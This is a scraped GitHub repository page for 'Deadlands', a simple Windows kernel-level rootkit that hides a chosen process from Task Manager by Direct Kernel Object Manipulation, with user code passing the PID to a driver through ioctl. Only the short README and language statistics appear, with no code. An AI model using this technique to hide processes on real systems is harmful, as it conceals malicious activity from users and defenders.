majdi / deadlands

:bomb: A simple kernel-level rootkit

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

Deadlands

Overview

A simple kernel-level rootkit.

Deadlands hides process. It prevents taskmngr from viewing a running process (for example, cmd.exe). Usercode from the project takes the PID of a process to hide, and communicates with our driver through ioctl.

Guidelines

Kenelcode uses DKOM (Direct Kernel Object Manipulation) to hide underlying structures of a process.

About

:bomb: A simple kernel-level rootkit


Languages

Language:C 63.5%Language:C# 20.8%Language:C++ 11.9%Language:Makefile 3.4%Language:Batchfile 0.4%